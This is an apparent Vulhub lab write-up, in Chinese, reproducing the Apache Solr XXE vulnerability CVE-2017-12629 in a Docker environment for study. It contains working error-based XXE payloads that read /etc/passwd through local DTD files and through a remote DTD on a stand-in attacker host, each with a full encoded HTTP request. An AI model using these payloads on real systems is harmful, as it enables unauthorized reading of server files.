Aaron
63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
160 lines
7.3 KiB
Markdown
160 lines
7.3 KiB
Markdown
# Apache Solr XML 外部实体注入漏洞(CVE-2017-12629)
|
||
|
||
Apache Solr 是一个开源的搜索服务器。它使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。在 7.1.0 版本之前,发现了两个漏洞:XML 外部实体注入(XXE)和远程命令执行(RCE),这两个漏洞的编号均为 CVE-2017-12629。这两个漏洞可以连接成利用链。
|
||
|
||
本环境演示 XXE 漏洞。关于 RCE 漏洞和利用链的演示,请参考 [CVE-2017-12629-RCE](../CVE-2017-12629-RCE/)。
|
||
|
||
参考链接:
|
||
|
||
- <https://www.exploit-db.com/exploits/43009/>
|
||
- <https://paper.seebug.org/425/>
|
||
|
||
## 环境搭建
|
||
|
||
执行如下命令启动 Apache Solr 服务器:
|
||
|
||
```
|
||
docker compose up -d
|
||
```
|
||
|
||
服务启动后,访问 `http://your-ip:8983/` 即可看到 Apache Solr 的管理页面,无需登录。
|
||
|
||
## 漏洞复现
|
||
|
||
由于返回包中不包含我们传入的 XML 中的信息,所以这是一个 Blind XXE 漏洞。但我们可以利用 [Error Based XXE](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) 来读取文件。
|
||
|
||
要利用 Error Based XXE,需要找到合适的 DTD 文件。这里提供几个思路:
|
||
|
||
### 使用 fontconfig-config 中的 fonts.dtd
|
||
|
||
openjdk 的 Docker 镜像安装了 fontconfig-config,其中包含一个符合要求的 DTD 文件:`/usr/share/xml/fontconfig/fonts.dtd`。
|
||
|
||
构造 XXE Payload:
|
||
|
||
```xml
|
||
<?xml version="1.0" ?>
|
||
<!DOCTYPE message [
|
||
<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
|
||
|
||
<!ENTITY % expr 'aaa)>
|
||
<!ENTITY % file SYSTEM "file:///etc/passwd">
|
||
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
|
||
%eval;
|
||
%error;
|
||
<!ELEMENT aa (bb'>
|
||
|
||
%local_dtd;
|
||
]>
|
||
<message>any text</message>
|
||
```
|
||
|
||
将编码后的 payload 放在如下请求中发送:
|
||
|
||
```
|
||
GET /solr/demo/select?wt=xml&defType=xmlparser&q=%3C%3Fxml%20version%3D%221%2E0%22%20%3F%3E%0A%3C%21DOCTYPE%20message%20%5B%0A%20%20%20%20%3C%21ENTITY%20%25%20local%5Fdtd%20SYSTEM%20%22file%3A%2F%2F%2Fusr%2Fshare%2Fxml%2Ffontconfig%2Ffonts%2Edtd%22%3E%0A%0A%20%20%20%20%3C%21ENTITY%20%25%20expr%20%27aaa%29%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20file%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20eval%20%22%3C%21ENTITY%20%26%23x26%3B%23x25%3B%20error%20SYSTEM%20%26%23x27%3Bfile%3A%2F%2F%2Fnonexistent%2F%26%23x25%3Bfile%3B%26%23x27%3B%3E%22%3E%0A%20%20%20%20%20%20%20%20%26%23x25%3Beval%3B%0A%20%20%20%20%20%20%20%20%26%23x25%3Berror%3B%0A%20%20%20%20%20%20%20%20%3C%21ELEMENT%20aa%20%28bb%27%3E%0A%0A%20%20%20%20%25local%5Fdtd%3B%0A%5D%3E%0A%3Cmessage%3Eany%20text%3C%2Fmessage%3E HTTP/1.1
|
||
Host: localhost.lan:8983
|
||
Accept-Encoding: gzip, deflate, br
|
||
Accept: */*
|
||
Accept-Language: en-US;q=0.9,en;q=0.8
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
|
||
Connection: close
|
||
Cache-Control: max-age=0
|
||
|
||
|
||
```
|
||
|
||
可见,成功读取到了 `/etc/passwd` 文件:
|
||
|
||
|
||
|
||
### 使用 JAR 包中的 DTD 文件
|
||
|
||
由于是黑盒测试,我们无法预测目标服务器安装了哪些软件,使用软件内部的 DTD 文件是一个更好的方法。比如可以使用 Solr 依赖的 lucene-queryparser.jar 中的 LuceneCoreQuery.dtd。
|
||
|
||
构造 XXE Payload:
|
||
|
||
```xml
|
||
<?xml version="1.0" ?>
|
||
<!DOCTYPE message [
|
||
<!ENTITY % local_dtd SYSTEM "jar:file:///opt/solr/server/solr-webapp/webapp/WEB-INF/lib/lucene-queryparser-7.0.1.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd">
|
||
|
||
<!ENTITY % queries 'aaa)>
|
||
<!ENTITY % file SYSTEM "file:///etc/passwd">
|
||
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
|
||
%eval;
|
||
%error;
|
||
<!ELEMENT aa (bb'>
|
||
|
||
%local_dtd;
|
||
]>
|
||
<message>any text</message>
|
||
```
|
||
|
||
将编码后的 payload 放在如下请求中发送:
|
||
|
||
```
|
||
GET /solr/demo/select?wt=xml&defType=xmlparser&q=%3C%3Fxml%20version%3D%221%2E0%22%20%3F%3E%0A%3C%21DOCTYPE%20message%20%5B%0A%20%20%20%20%3C%21ENTITY%20%25%20local%5Fdtd%20SYSTEM%20%22jar%3Afile%3A%2F%2F%2Fopt%2Fsolr%2Fserver%2Fsolr%2Dwebapp%2Fwebapp%2FWEB%2DINF%2Flib%2Flucene%2Dqueryparser%2D7%2E0%2E1%2Ejar%21%2Forg%2Fapache%2Flucene%2Fqueryparser%2Fxml%2FLuceneCoreQuery%2Edtd%22%3E%0A%0A%20%20%20%20%3C%21ENTITY%20%25%20queries%20%27aaa%29%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20file%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20eval%20%22%3C%21ENTITY%20%26%23x26%3B%23x25%3B%20error%20SYSTEM%20%26%23x27%3Bfile%3A%2F%2F%2Fnonexistent%2F%26%23x25%3Bfile%3B%26%23x27%3B%3E%22%3E%0A%20%20%20%20%20%20%20%20%26%23x25%3Beval%3B%0A%20%20%20%20%20%20%20%20%26%23x25%3Berror%3B%0A%20%20%20%20%20%20%20%20%3C%21ELEMENT%20aa%20%28bb%27%3E%0A%0A%20%20%20%20%25local%5Fdtd%3B%0A%5D%3E%0A%3Cmessage%3Eany%20text%3C%2Fmessage%3E HTTP/1.1
|
||
Host: localhost.lan:8983
|
||
Accept-Encoding: gzip, deflate, br
|
||
Accept: */*
|
||
Accept-Language: en-US;q=0.9,en;q=0.8
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
|
||
Connection: close
|
||
Cache-Control: max-age=0
|
||
|
||
|
||
```
|
||
|
||
可见,成功读取到了 `/etc/passwd` 文件:
|
||
|
||
|
||
|
||
### 使用远程 DTD 文件
|
||
|
||
如果我们在目标服务器上找不到合适的本地 DTD 文件,且服务器可以连接外网,也可以使用远程 DTD 文件。
|
||
|
||
在 HTTP 服务器上部署一个 DTD 文件:
|
||
|
||
```xml
|
||
<!ENTITY % test "example">
|
||
<!ELEMENT pattern (%test;)>
|
||
```
|
||
|
||
然后构造 XXE Payload:
|
||
|
||
```xml
|
||
<?xml version="1.0" ?>
|
||
<!DOCTYPE message [
|
||
<!ENTITY % local_dtd SYSTEM "http://evil.host.name/include.dtd">
|
||
|
||
<!ENTITY % test 'aaa)>
|
||
<!ENTITY % file SYSTEM "file:///etc/passwd">
|
||
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
|
||
%eval;
|
||
%error;
|
||
<!ELEMENT aa (bb'>
|
||
|
||
%local_dtd;
|
||
]>
|
||
<message>any text</message>
|
||
```
|
||
|
||
将编码后的 payload 放在如下请求中发送:
|
||
|
||
```
|
||
GET /solr/demo/select?wt=xml&defType=xmlparser&q=%3C%3Fxml%20version%3D%221%2E0%22%20%3F%3E%0A%3C%21DOCTYPE%20message%20%5B%0A%20%20%20%20%3C%21ENTITY%20%25%20local%5Fdtd%20SYSTEM%20%22https%3A%2F%2Fgist%2Egithubusercontent%2Ecom%2Fphith0n%2F188f03ac0f3c5d899895268f05fd0a51%2Fraw%2F7b481b122622d77c49c619fa047a52051f9652d8%2Finclude%2Edtd%22%3E%0A%0A%20%20%20%20%3C%21ENTITY%20%25%20test%20%27aaa%29%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20file%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%0A%20%20%20%20%20%20%20%20%3C%21ENTITY%20%26%23x25%3B%20eval%20%22%3C%21ENTITY%20%26%23x26%3B%23x25%3B%20error%20SYSTEM%20%26%23x27%3Bfile%3A%2F%2F%2Fnonexistent%2F%26%23x25%3Bfile%3B%26%23x27%3B%3E%22%3E%0A%20%20%20%20%20%20%20%20%26%23x25%3Beval%3B%0A%20%20%20%20%20%20%20%20%26%23x25%3Berror%3B%0A%20%20%20%20%20%20%20%20%3C%21ELEMENT%20aa%20%28bb%27%3E%0A%0A%20%20%20%20%25local%5Fdtd%3B%0A%5D%3E%0A%3Cmessage%3Eany%20text%3C%2Fmessage%3E HTTP/1.1
|
||
Host: localhost.lan:8983
|
||
Accept-Encoding: gzip, deflate, br
|
||
Accept: */*
|
||
Accept-Language: en-US;q=0.9,en;q=0.8
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
|
||
Connection: close
|
||
Cache-Control: max-age=0
|
||
|
||
|
||
```
|
||
|
||
可见,成功读取到了 `/etc/passwd` 文件:
|
||
|
||
|